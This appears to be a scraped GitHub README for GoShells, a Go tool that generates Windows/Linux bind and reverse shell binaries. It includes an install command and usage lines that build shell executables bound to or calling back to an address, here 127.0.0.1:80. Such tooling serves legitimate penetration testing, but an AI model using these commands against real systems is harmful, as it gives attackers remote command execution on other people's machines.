shoriwe / GoShells

Quick tool to create Windows/Linux Bind or reverse shells binaries

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

GoShells

Quick tool to create Windows/Linux Bind or reverse shells binaries

Installation

go install github.com/shoriwe/GoShells/cmd/goshells@latest

Usage

Create a bind based command execution

goshells shell.elf bind 127.0.0.1:80 /bin/sh

Create a reverse based command execution

goshells shell.elf reverse 127.0.0.1:80 /bin/sh

About

Quick tool to create Windows/Linux Bind or reverse shells binaries

License:MIT License


Languages

Language:Go 100.0%